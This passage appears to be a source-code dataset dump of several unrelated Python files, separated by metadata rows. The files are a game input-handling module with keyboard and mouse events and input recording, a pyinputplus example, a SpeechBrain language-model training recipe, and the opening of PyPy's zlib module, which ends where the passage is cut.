KEY_PERCENT = 37 KEY_AMPERSAND = 38 KEY_APOSTROPHE = 39 KEY_LEFT_PARENTHESIS = 40 KEY_RIGHT_PARENTHESIS = 41 KEY_ASTERISK = 42 KEY_PLUS = 43 KEY_COMMA = 44 KEY_MINUS = 45 KEY_PERIOD = 46 KEY_SLASH = 47 KEY_COLON = 58 KEY_SEMICOLON = 59 KEY_LESS = 60 KEY_EQUAL = 61 KEY_GREATER = 62 KEY_QUESTION = 63 KEY_AT = 64 KEY_LEFT_BRACKET = 91 KEY_BACKSLASH = 92 KEY_RIGHT_BRACKET = 93 KEY_ASCII_CIRCUMFLEX = 94 KEY_UNDERSCORE = 95 KEY_GRAVE = 96 KEY_QUOTE_LEFT = 96 KEY_A = 97 KEY_B = 98 KEY_C = 99 KEY_D = 100 KEY_E = 101 KEY_F = 102 KEY_G = 103 KEY_H = 104 KEY_I = 105 KEY_J = 106 KEY_K = 107 KEY_L = 108 KEY_M = 109 KEY_N = 110 KEY_O = 111 KEY_P = 112 KEY_Q = 113 KEY_R = 114 KEY_S = 115 KEY_T = 116 KEY_U = 117 KEY_V = 118 KEY_W = 119 KEY_X = 120 KEY_Y = 121 KEY_Z = 122 KEY_LEFT_BRACE = 123 KEY_BAR = 124 KEY_RIGHT_BRACE = 125 KEY_ASCII_TILDE = 126 TABLE = { KEY_SPACE: " ", KEY_NUM_0: "0", KEY_NUM_1: "1", KEY_NUM_2: "2", KEY_NUM_3: "3", KEY_NUM_4: "4", KEY_NUM_5: "5", KEY_NUM_6: "6", KEY_NUM_7: "7", KEY_NUM_8: "8", KEY_NUM_9: "9", KEY_A: "a", KEY_B: "b", KEY_C: "c", KEY_D: "d", KEY_E: "e", KEY_F: "f", KEY_G: "g", KEY_H: "h", KEY_I: "i", KEY_J: "j", KEY_K: "k", KEY_L: "l", KEY_M: "m", KEY_N: "n", KEY_O: "o", KEY_P: "p", KEY_Q: "q", KEY_R: "r", KEY_S: "s", KEY_T: "t", KEY_U: "u", KEY_V: "v", KEY_W: "w", KEY_X: "x", KEY_Y: "y", KEY_Z: "z" } @staticmethod def get_corresponding_char(key_code: int) -> str: """ Converts the key code into the associated character. Looks up the key code in the class table and finds the corresponding character. If the key code is unknown, it returns an empty string. Parameters ---------- key_code The code of the key. Returns ------- character: str The character corresponding to the key code. """ if key_code in Key.TABLE: return Key.TABLE[key_code] return "" class MouseButton: """ An enumeration containing the different mouse button codes. The user mouse button inputs are represented using button codes. The MouseButton class stores the key codes of every possible input that can be issued by the Window. """ MOUSE_BUTTON_LEFT = 1 MOUSE_BUTTON_RIGHT = 4 MOUSE_BUTTON_MIDDLE = 2 class InputEvent(CancelableEvent): """ A generic type of event used for user input. This type of event is used for any event related to a user input. Theses event extend from CancelableEvent, hence they can be canceled while being processed by the event queue. This can be useful if more than one object interact with the keyboard at once, by giving priority to one over the others. Attributes ---------- tick: int The tick at which the event got fired. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "InputEvent[tick=" + str(self.tick) + ", canceled=" + str(self._canceled) + "]" class KeyEvent(InputEvent): """ A generic type of event used for key input. This type of event is used for any event related to the update of a key input. Theses event extend from CancelableEvent, hence they can be canceled while being processed by the event queue. This can be useful if more than one object interact with the keyboard at once, by giving priority to one over the others. Attributes ---------- tick: int The tick at which the event got fired. key: int The code of the key updated (see also Key). Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __init__(self, tick: int, key: int): """ Initializes the KeyEvent. Parameters ---------- tick: int The tick at which the event got fired. key: int The code of the key updated (see also Key). """ CancelableEvent.__init__(self, tick) self.key = key def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "KeyEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", canceled=" + str(self._canceled) + "]" class KeyPressedEvent(KeyEvent): """ The type of KeyEvent used for key press event. This kind of event is fired whenever an key is being pressed. Unlike the KeyHeldEvent, this event is only issued once before the key got released. Attributes ---------- tick: int The tick at which the event got fired. key: int The code of the key pressed. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "KeyPressedEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \ "canceled=" + str(self._canceled) + "]" class KeyReleasedEvent(KeyEvent): """ The type of KeyEvent used for key release event. This kind of event is fired whenever an key is being released. This event can only be fired after a KeyPressedEvent is issued. Attributes ---------- tick: int The tick at which the event got fired. key: int The code of the key released. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "KeyReleasedEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \ "canceled=" + str(self._canceled) + "]" class KeyTypedEvent(KeyEvent): """ The type of KeyEvent used for key type event. This kind of event is fired whenever an key is being typed. This event will be fired when the Key is released only if it had been held for a short period of time (see InputHandler to specify the delay). Attributes ---------- tick: int The tick at which the event got fired. key: int The code of the key typed. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "KeyTypedEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \ "canceled=" + str(self._canceled) + "]" class KeyHeldEvent(KeyEvent): """ The type of KeyEvent used for key hold event. This kind of event is fired whenever an key is being held. This event will be repeated each tick while the key is being held. It is always preceded by a KeyPressedEvent and followed by KeyReleasedEvent of the same key. Attributes ---------- tick: int The tick at which the event got fired. key: int The code of the key held. duration: int The number of tick for which the key has been held for. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __init__(self, tick: int, key: int, duration: int): """ Initializes the KeyHeldEvent. Parameters ---------- tick: int The tick at which the event got fired. key: int The code of the key held. duration: int The number of tick for which the key has been held for. """ KeyEvent.__init__(self, tick, key) self.duration = duration def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "KeyHeldEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \ "duration=" + str(self.duration) + ", canceled=" + str(self._canceled) + "]" class MouseEvent(InputEvent): """ A generic type of event used for mouse input. This type of event is used for any event related to the update of the mouse state (either a mouse button or the position of the pointer). Theses events extends from CancelableEvent, hence they can be canceled while being processed by the event queue. This can be useful if more than one object interact with the mouse at once, by giving priority to one over the others. Attributes ---------- tick: int The tick at which the event got fired. position: numpy.ndarray The position of the pointer on the screen. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __init__(self, tick: int, position: numpy.ndarray): """ Initializes the MouseEvent. Parameters ---------- tick: int The tick at which the event got fired. position: numpy.ndarray The position of the pointer on the screen. """ CancelableEvent.__init__(self, tick) self.position = position def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "MouseEvent[tick=" + str(self.tick) + ", position=" + str(self.position) + ", " + \ "canceled=" + str(self._canceled) + "]" class MouseMovedEvent(MouseEvent): """ The type of MouseEvent used for mouse move event. This kind of event is fired whenever the mouse is being moved. Attributes ---------- tick: int The tick at which the event got fired. position: numpy.ndarray The position of the pointer on the screen. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "MouseMovedEvent[tick=" + str(self.tick) + ", position=" + str(self.position) + ", " + \ "canceled=" + str(self._canceled) + "]" class MouseButtonEvent(MouseEvent): """ A generic type of event used for mouse button input. This type of event is used for any event related to the update of a mouse button state. Theses events extends from CancelableEvent, hence they can be canceled while being processed by the event queue. This can be useful if more than one object interact with the mouse at once, by giving priority to one over the others. Attributes ---------- tick: int The tick at which the event got fired. button: int The code of the mouse button updated (see also MouseButton). position: numpy.ndarray The position of the pointer on the screen. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __init__(self, tick: int, button: int, position: numpy.ndarray): """ Initializes the MouseButtonEvent. Parameters ---------- tick: int The tick at which the event got fired. button: int The code of the mouse button updated. position: numpy.ndarray The position of the pointer on the screen. """ MouseEvent.__init__(self, tick, position) self.button = button def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "MouseButtonEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \ "position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]" class MouseButtonPressedEvent(MouseButtonEvent): """ The type of MouseButtonEvent used for mouse button press event. This kind of event is fired whenever a mouse button is being pressed. Unlike the MouseDraggedEvent, this event is only issued once before the key got released. Attributes ---------- tick: int The tick at which the event got fired. button: int The code of the mouse button pressed. position: numpy.ndarray The position of the pointer on the screen. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "MouseButtonPressedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \ "position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]" class MouseButtonReleasedEvent(MouseButtonEvent): """ The type of MouseButtonEvent used for mouse button release event. This kind of event is fired whenever a mouse button is being released. This event can only be fired after a MouseButtonPressedEvent is issued. Attributes ---------- tick: int The tick at which the event got fired. button: int The code of the mouse button released. position: numpy.ndarray The position of the pointer on the screen. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "MouseButtonReleasedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \ "position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]" class MouseButtonClickedEvent(MouseButtonEvent): """ The type of MouseButtonEvent used for mouse button click event. This kind of event is fired whenever a mouse button is being clicked. This event will be fired when the mouse button is released only if it had been held for a short period of time (see InputHandler to specify the delay). Attributes ---------- tick: int The tick at which the event got fired. button: int The code of the mouse button clicked. position: numpy.ndarray The position of the pointer on the screen. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "MouseButtonClickedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \ "position=" + str(self.position) + ", canceled=" + str(self._canceled) + "]" class MouseDraggedEvent(MouseButtonEvent): """ The type of MouseButtonEvent used for mouse drag event. This kind of event is fired whenever a mouse button is being dragged (in other words, when the mouse is being moved while a mouse button is held). This event will be repeated each tick while the mouse button is being held. It is always preceded by a MouseButtonPressedEvent and followed by MouseButtonReleasedEvent of the same mouse button. Attributes ---------- tick: int The tick at which the event got fired. button: int The code of the mouse button held. position: numpy.ndarray The position of the pointer on the screen. duration: int The number of tick for which the mouse button has been held for. Methods ------- cancel() Cancels the event. is_canceled() Returns whether or not the event got canceled. """ def __init__(self, tick: int, button: int, position: numpy.ndarray, duration: int): """ Initializes the MouseDraggedEvent. Parameters ---------- tick: int The tick at which the event got fired. button: int The code of the mouse button held. position: numpy.ndarray The position of the pointer on the screen. duration: int The number of tick for which the mouse button has been held for. """ MouseButtonEvent.__init__(self, tick, button, position) self.duration = duration def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "MouseButtonDraggedEvent[tick=" + str(self.tick) + ", button=" + str(self.button) + ", " + \ "duration=" + str(self.duration) + ", position=" + str(self.position) + ", " + \ "canceled=" + str(self._canceled) + "]" class InputHandler: """ The source of any user input. Any game with user interaction should use an InputHandler. Attributes ---------- mouse_position: numpy.ndarray The current position of the mouse pointer on the screen. Methods ------- fire_events(tick) Fires the key and mouse events. record() Starts the input recording. export_record(path) Exports the record into a replay file. load_replay(path) Loads a replay and plays it. key_press(key_code) Sets the state of the specified key as pressed. key_release(key_code) Sets the state of the specified key as released. mouse_button_press(mouse_button) Sets the state of the specified key as pressed. mouse_button_release(mouse_button) Sets the state of the specified mouse button as released. move_mouse(position) Sets the position of the mouse pointer. """ DEFAULT_DURATION_TYPE = 20 DEFAULT_DURATION_CLICK = 20 def __init__(self, event_queue: EventQueue, duration_type: int = DEFAULT_DURATION_TYPE, duration_click: int = DEFAULT_DURATION_CLICK): """ Initializes the InputHandler. Parameters ---------- event_queue: EventQueue The main event queue used to handle the events. duration_type: int, optional The threshold expressed in tick before which a key hold is considered as a type. duration_click: int, optional the threshold expressed in tick before which a mouse button hold is considered a click. """ self._event_queue = event_queue self._duration_type = duration_type self._duration_click = duration_click self._key_durations = {} self._mouse_button_durations = {} self.mouse_position = numpy.array((0, 0), dtype=int) self._mouse_previous_position = numpy.array((0, 0), dtype=int) self._recorder = None self._replay = None self._should_record = False def key_press(self, key_code: int) -> None: """ Sets the state of the specified key as pressed. Makes the InputHandler consider the specified key as pressed until another function to release the key is called. Parameters ---------- key_code: int The code of the key pressed. """ if key_code not in self._key_durations: self._key_durations[key_code] = [0, False] def key_release(self, key_code: int) -> None: """ Sets the state of the specified key as released. Makes the InputHandler consider the specified key as released until another function to press the key is called. Parameters ---------- key_code: int The code of the key released. """ if key_code in self._key_durations: self._key_durations[key_code][1] = True def mouse_button_press(self, mouse_button: int) -> None: """ Sets the state of the specified mouse button as pressed. Makes the InputHandler consider the specified mouse button as pressed until another function to release the button is called. Parameters ---------- mouse_button: int The code of the mouse button pressed. """ if mouse_button not in self._mouse_button_durations: self._mouse_button_durations[mouse_button] = [0, False] def mouse_button_release(self, mouse_button: int) -> None: """ Sets the state of the specified mouse button as released. Makes the InputHandler consider the specified mouse button as released until another function to press the button is called. Parameters ---------- mouse_button: int The code of the mouse button released. """ if mouse_button in self._mouse_button_durations: self._mouse_button_durations[mouse_button][1] = True def move_mouse(self, position: numpy.ndarray) -> None: """ Sets the position of the mouse pointer. Parameters ---------- position: numpy.ndarray The current position of the mouse pointer on the screen. """ self.mouse_position = position def record(self) -> None: """ Starts the input recording. """ self._should_record = True def export_record(self, path) -> None: """ Exports the record into a replay file. Parameters ---------- path: str The path to the replay file. """ with open(path, "w") as file: json.dump(self._recorder.inputs, file) def load_replay(self, path, replay_tick: int = 0) -> None: """ Loads a replay and plays it. Parameters ---------- path: str The path to the replay file. replay_tick: int The local tick reference of the replay. """ with open(path, "r") as file: inputs = json.load(file) self._replay = InputReplay(inputs, replay_tick=replay_tick) def fire_events(self, tick: int) -> None: """ Fires the key and mouse events. This function creates every event related to key and mouse inputs and queues them in the main event queue. It should be called at every tick, each time the logic is done. Parameters ---------- tick: int The current logic tick. """ if self._replay is not None: self._replay.play(tick, self) if self._should_record: self._recorder = InputRecorder(tick) self._should_record = False for key in list(self._key_durations.keys()): if self._key_durations[key][1]: self._event_queue.fire_event(KeyReleasedEvent(tick, key)) if self._recorder is not None: self._recorder.key_release(tick, key) if self._key_durations[key][0] <= self._duration_type: self._event_queue.fire_event(KeyTypedEvent(tick, key)) del self._key_durations[key] else: if self._key_durations[key][0] == 0: self._event_queue.fire_event(KeyPressedEvent(tick, key)) if self._recorder is not None: self._recorder.key_press(tick, key) else: self._event_queue.fire_event(KeyHeldEvent(tick, key, self._key_durations[key][0])) self._key_durations[key][0] += 1 for mouse_button in list(self._mouse_button_durations.keys()): if self._mouse_button_durations[mouse_button][1]: self._event_queue.fire_event(MouseButtonReleasedEvent(tick, mouse_button, self.mouse_position)) if self._recorder is not None: self._recorder.mouse_button_release(tick, mouse_button) if self._mouse_button_durations[mouse_button][0] < self._duration_click: self._event_queue.fire_event(MouseButtonClickedEvent(tick, mouse_button, self.mouse_position)) del self._mouse_button_durations[mouse_button] else: if self._mouse_button_durations[mouse_button][0] == 0: self._event_queue.fire_event(MouseButtonPressedEvent(tick, mouse_button, self.mouse_position)) if self._recorder is not None: self._recorder.mouse_button_press(tick, mouse_button) elif not numpy.array_equal(self.mouse_position, self._mouse_previous_position): self._event_queue.fire_event(MouseDraggedEvent( tick, mouse_button, self.mouse_position, self._mouse_button_durations[mouse_button][0] )) self._mouse_button_durations[mouse_button][0] += 1 if not numpy.array_equal(self.mouse_position, self._mouse_previous_position): self._event_queue.fire_event(MouseMovedEvent(tick, self.mouse_position)) if self._recorder is not None: self._recorder.move_mouse(tick, self.mouse_position) self._mouse_previous_position = self.mouse_position def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "InputHandler[mouse_position=" + str(self.mouse_position) + "]" class InputReplay: """ A simple way of queueing a sequence of inputs. Methods ------- play(tick, input_handler) Plays the actions of the replay of the specified tick. """ EVENT_KEY_PRESS = 0 EVENT_KEY_RELEASE = 1 EVENT_MOUSE_BUTTON_PRESS = 2 EVENT_MOUSE_BUTTON_RELEASE = 3 EVENT_MOUSE_MOVE = 4 def __init__(self, inputs: dict, replay_tick: int = 0): """ Initializes the InputReplay. Parameters ---------- inputs: dict The input events with the tick at which they will be issued. replay_tick: int, optional The local reference tick. """ self._inputs = inputs self._tick = replay_tick def play(self, tick: int, input_handler: InputHandler) -> None: """ Plays the actions of the replay of the specified tick. Parameters ---------- tick: int The current logic tick. input_handler: InputHandler The main input handler controlled by the replay. """ local_tick = str(tick - self._tick) if local_tick in self._inputs: events = self._inputs[local_tick] for event in events: if event[0] == InputReplay.EVENT_KEY_PRESS: input_handler.key_press(key_code=event[1]) elif event[0] == InputReplay.EVENT_KEY_RELEASE: input_handler.key_release(key_code=event[1]) elif event[0] == InputReplay.EVENT_MOUSE_BUTTON_PRESS: input_handler.mouse_button_press(mouse_button=event[1]) elif event[0] == InputReplay.EVENT_MOUSE_BUTTON_RELEASE: input_handler.mouse_button_release(mouse_button=event[1]) elif event[0] == InputReplay.EVENT_MOUSE_MOVE: input_handler.move_mouse(position=numpy.ndarray(event[1])) def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "InputReplay[tick=" + str(self._tick) + "]" class InputRecorder: """ A simple way of recording user inputs. When a record is started, it will register the inputs from the user. Attributes ---------- inputs: dict The input events with the tick at which they were issued. Methods ------- key_press(tick, key_code) Adds a key press input to the record. key_release(tick, key_code) Adds a key release input to the record. mouse_button_press(tick, mouse_button) Adds a mouse button press input to the record. mouse_button_release(tick, mouse_button) Adds a mouse button release input to the record. move_mouse(tick, position) Adds a mouse move input to the record. get_replay(replay_tick) Creates a replay based of the record. """ def __init__(self, record_tick: int = 0): """ Initializes the InputRecorder. Parameters ---------- record_tick: int, optional The local reference tick. """ self._record_tick = record_tick self.inputs = {} def _input(self, tick, event_type: int, value: any) -> None: """ Adds a new input to the record. Parameters ---------- tick: int The tick at which the input was issued. event_type: int The type of input. value: any The event data. """ local_tick = tick - self._record_tick if local_tick not in self.inputs: self.inputs[local_tick] = [] self.inputs[local_tick].append([event_type, value]) def key_press(self, tick: int, key_code: int) -> None: """ Adds a key press input to the record. Parameters ---------- tick: int The tick at which the event got fired. key_code: int The code of the key pressed. """ self._input(tick, InputReplay.EVENT_KEY_PRESS, key_code) def key_release(self, tick: int, key_code: int) -> None: """ Adds a key release input to the record. Parameters ---------- tick: int The tick at which the event got fired. key_code: int The code of the key released. """ self._input(tick, InputReplay.EVENT_KEY_RELEASE, key_code) def mouse_button_press(self, tick: int, mouse_button: int) -> None: """ Adds a mouse button press input to the record. Parameters ---------- tick: int The tick at which the event got fired. mouse_button: int The code of the mouse button pressed. """ self._input(tick, InputReplay.EVENT_MOUSE_BUTTON_PRESS, mouse_button) def mouse_button_release(self, tick: int, mouse_button: int) -> None: """ Adds a mouse button release input to the record. Parameters ---------- tick: int The tick at which the event got fired. mouse_button: int The code of the mouse button released. """ self._input(tick, InputReplay.EVENT_MOUSE_BUTTON_RELEASE, mouse_button) def move_mouse(self, tick: int, position: numpy.ndarray) -> None: """ Adds a mouse move input to the record. Parameters ---------- tick: int The tick at which the event got fired. position: numpy.ndarray The current position of the mouse pointer on the screen. """ self._input(tick, InputReplay.EVENT_MOUSE_MOVE, tuple(position)) def get_replay(self, replay_tick: int = 0) -> InputReplay: """ Creates a replay based of the record. Parameters ---------- replay_tick: int The local tick reference of the replay. Returns ------- replay: InputReplay The replay associated to the record. """ return InputReplay(self.inputs, replay_tick) def __str__(self) -> str: """ Returns a description string of the object. Returns ------- string: str The string object description. """ return "InputRecorder[tick=" + str(self._record_tick) + "]"
27.955585
120
0.593902
6bd69aefb8753456fe6243ada8bcc8b569036450
912
py
Python
main/strings/validation/input_plus.py
catalinprescure/python-pages
93df3b22df2cfa269127e803a1b6c6a34bae6745
[ "MIT" ]
null
null
null
main/strings/validation/input_plus.py
catalinprescure/python-pages
93df3b22df2cfa269127e803a1b6c6a34bae6745
[ "MIT" ]
null
null
null
main/strings/validation/input_plus.py
catalinprescure/python-pages
93df3b22df2cfa269127e803a1b6c6a34bae6745
[ "MIT" ]
1
2021-12-24T15:58:32.000Z
2021-12-24T15:58:32.000Z
"""Pyinputplus Contains functions similar to input() for other kind of data: number, date, email, adress Pyinputplus is not part of the standard distribution. pip install pyinputplus Import as pyip save us from typing pyinputplus every time. """ import pyinputplus as pyip response = pyip.inputNum('What is your age? ', min=10, limit=4) print(f'Your age is: {response}') # What is your age? 6 # Number must be at minimum 10. # What is your age? -10 # Number must be at minimum 10. # What is your age? abc # 'abc' is not a number. # What is your age? 5 # Exception: pyinputplus.RetryLimitException response = pyip.inputMenu(['dog', 'cat', 'horse'], lettered=True, prompt='What is your favorite animal? \n' ) print(f'Your favorite animal is: {response}') # What is your favorite animal? # A. dog # B. cat # C. horse # b # Your favorite animal is: cat
30.4
65
0.674342
cb666a17551be48cc70883bb60cccf0da07f315b
6,988
py
Python
recipes/LibriSpeech/LM/train.py
anonymspeechbrain/speechbrain
9a0632ddb066f5bceffb71fb971552fb542f7b7e
[ "Apache-2.0" ]
null
null
null
recipes/LibriSpeech/LM/train.py
anonymspeechbrain/speechbrain
9a0632ddb066f5bceffb71fb971552fb542f7b7e
[ "Apache-2.0" ]
null
null
null
recipes/LibriSpeech/LM/train.py
anonymspeechbrain/speechbrain
9a0632ddb066f5bceffb71fb971552fb542f7b7e
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 """Recipe for training a Language Model with librispeech train-960 transcript and lm_corpus. To run this recipe, do the following: > pip install datasets > python train.py hparams/<hparam_file>.yaml --data_folder <local_path_to_librispeech_dataset> Authors * Anonymous """ import os import sys import logging import glob import torch from datasets import load_dataset from hyperpyyaml import load_hyperpyyaml import speechbrain as sb from speechbrain.utils.distributed import run_on_main logger = logging.getLogger(__name__) # Define training procedure class LM(sb.core.Brain): def compute_forward(self, batch, stage): """Forward computations from the sentence batches to the output probabilities.""" batch = batch.to(self.device) tokens_bos, _ = batch.tokens_bos logits = self.hparams.model(tokens_bos) pred = self.hparams.log_softmax(logits) return pred def compute_objectives(self, predictions, batch, stage): """Computes the loss given predictions and targets.""" batch = batch.to(self.device) tokens_eos, tokens_len = batch.tokens_eos loss = self.hparams.compute_cost( predictions, tokens_eos, length=tokens_len ) return loss def fit_batch(self, batch): """Train the parameters given a single batch in input""" predictions = self.compute_forward(batch, sb.Stage.TRAIN) loss = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) (loss / self.hparams.accu_steps).backward() if self.step % self.hparams.accu_steps == 0: # gradient clipping & early stop if loss is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() if isinstance( self.hparams.lr_annealing, sb.nnet.schedulers.NoamScheduler ) or isinstance( self.hparams.lr_annealing, sb.nnet.schedulers.CyclicCosineScheduler, ): self.hparams.lr_annealing(self.optimizer) return loss def on_stage_end(self, stage, stage_loss, epoch): """Gets called at the end of a epoch.""" stage_stats = {"loss": stage_loss} if stage == sb.Stage.TRAIN: self.train_stats = stage_stats if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process(): if not ( isinstance( self.hparams.lr_annealing, sb.nnet.schedulers.NoamScheduler ) or isinstance( self.hparams.lr_annealing, sb.nnet.schedulers.CyclicCosineScheduler, ) ): old_lr, new_lr = self.hparams.lr_annealing(stage_loss) sb.nnet.schedulers.update_learning_rate(self.optimizer, new_lr) else: old_lr = self.hparams.lr_annealing.current_lr self.hparams.train_logger.log_stats( stats_meta={"epoch": epoch, "lr": old_lr}, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta=stage_stats, min_keys=["loss"], ) def dataio_prepare(hparams): """grap all the .txt files for transcripts""" logging.info("generating datasets...") data_folder = hparams["data_folder"] train_transcripts = glob.glob( os.path.join(data_folder, "train*/**/*.trans.txt"), recursive=True ) dev_transcripts = glob.glob( os.path.join(data_folder, "dev*/**/*.trans.txt"), recursive=True ) test_transcripts = glob.glob( os.path.join(data_folder, "test*/**/*.trans.txt"), recursive=True ) """prepare data and generate datasets""" datasets = load_dataset( "dataset.py", lm_corpus_path=hparams["lm_corpus_path"], data_files={ "train": train_transcripts, "dev": dev_transcripts, "test": test_transcripts, }, ) train_data, valid_data, test_data = ( datasets["train"], datasets["dev"], datasets["test"], ) """convert huggingface's dataset to DynamicItemDataset via a magical function""" train_data = sb.dataio.dataset.DynamicItemDataset.from_arrow_dataset( train_data ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_arrow_dataset( valid_data ) test_data = sb.dataio.dataset.DynamicItemDataset.from_arrow_dataset( test_data ) datasets = [train_data, valid_data, test_data] tokenizer = hparams["tokenizer"] """Define text pipeline""" # TODO: implement text augmentations pipelines @sb.utils.data_pipeline.takes("text") @sb.utils.data_pipeline.provides("text", "tokens_bos", "tokens_eos") def text_pipeline(text): yield text tokens_list = tokenizer.encode_as_ids(text) tokens_bos = torch.LongTensor([hparams["bos_index"]] + (tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams["eos_index"]]) yield tokens_eos sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set output: sb.dataio.dataset.set_output_keys( datasets, ["id", "text", "tokens_bos", "tokens_eos"], ) return train_data, valid_data, test_data if __name__ == "__main__": # CLI: hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams = load_hyperpyyaml(fin, overrides) # If distributed_launch=True then # create ddp_group with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) # Create experiment directory sb.create_experiment_directory( experiment_directory=hparams["output_folder"], hyperparams_to_save=hparams_file, overrides=overrides, ) # here we create the dataloader objects as well as tokenization and encoding train_data, valid_data, test_data = dataio_prepare(hparams) # We download the tokenizer from HuggingFace (or elsewhere depending on # the path given in the YAML file). run_on_main(hparams["pretrainer"].collect_files) hparams["pretrainer"].load_collected(device=run_opts["device"]) lm_brain = LM( modules=hparams["modules"], opt_class=hparams["optimizer"], hparams=hparams, run_opts=run_opts, checkpointer=hparams["checkpointer"], ) lm_brain.fit( lm_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams["train_dataloader_opts"], valid_loader_kwargs=hparams["valid_dataloader_opts"], ) # evaluation test_stats = lm_brain.evaluate( test_data, min_key="loss", test_loader_kwargs=hparams["test_dataloader_opts"], )
32.807512
94
0.647825
2dbf49c3c682c3a675a48c9aad656349ff7f2784
12,478
py
Python
pypy/module/zlib/interp_zlib.py
microvm/pypy-mu
6b03fbe93052d0eb3a4c67152c987c16837b3484
[ "Apache-2.0", "OpenSSL" ]
null
null
null
pypy/module/zlib/interp_zlib.py
microvm/pypy-mu
6b03fbe93052d0eb3a4c67152c987c16837b3484
[ "Apache-2.0", "OpenSSL" ]
null
null
null
pypy/module/zlib/interp_zlib.py
microvm/pypy-mu
6b03fbe93052d0eb3a4c67152c987c16837b3484
[ "Apache-2.0", "OpenSSL" ]
null
null
null
import sys from pypy.interpreter.gateway import interp2app, unwrap_spec from pypy.interpreter.baseobjspace import W_Root from pypy.interpreter.typedef import TypeDef, interp_attrproperty from pypy.interpreter.error import OperationError, oefmt from rpython.rlib.rarithmetic import intmask, r_uint from rpython.rlib.objectmodel import keepalive_until_here from rpython.rlib import rzlib if intmask(2**31) == -2**31: # 32-bit platforms unsigned_to_signed_32bit = intmask else: # 64-bit platforms def unsigned_to_signed_32bit(x): # assumes that 'x' is in range(0, 2**32) to start with SIGN_EXTEND2 = 1 << 31 return intmask((x ^ SIGN_EXTEND2) - SIGN_EXTEND2) @unwrap_spec(string='bufferstr', start='truncatedint_w') def crc32(space, string, start = rzlib.CRC32_DEFAULT_START): """ crc32(string[, start]) -- Compute a CRC-32 checksum of string. An optional starting value can be specified. The returned checksum is an integer. """ ustart = r_uint(start) checksum = rzlib.crc32(string, ustart) # This is, perhaps, a little stupid. zlib returns the checksum unsigned. # CPython exposes it as a signed value, though. -exarkun # Note that in CPython < 2.6 on 64-bit platforms the result is # actually unsigned, but it was considered to be a bug so we stick to # the 2.6 behavior and always return a number in range(-2**31, 2**31). checksum = unsigned_to_signed_32bit(checksum) return space.wrap(checksum) @unwrap_spec(string='bufferstr', start='truncatedint_w') def adler32(space, string, start=rzlib.ADLER32_DEFAULT_START): """ adler32(string[, start]) -- Compute an Adler-32 checksum of string. An optional starting value can be specified. The returned checksum is an integer. """ ustart = r_uint(start) checksum = rzlib.adler32(string, ustart) # See comments in crc32() for the following line checksum = unsigned_to_signed_32bit(checksum) return space.wrap(checksum) class Cache: def __init__(self, space): self.w_error = space.new_exception_class("zlib.error") def zlib_error(space, msg): w_error = space.fromcache(Cache).w_error return OperationError(w_error, space.wrap(msg)) @unwrap_spec(string='bufferstr', level=int) def compress(space, string, level=rzlib.Z_DEFAULT_COMPRESSION): """ compress(string[, level]) -- Returned compressed string. Optional arg level is the compression level, in 1-9. """ try: try: stream = rzlib.deflateInit(level) except ValueError: raise zlib_error(space, "Bad compression level") try: result = rzlib.compress(stream, string, rzlib.Z_FINISH) finally: rzlib.deflateEnd(stream) except 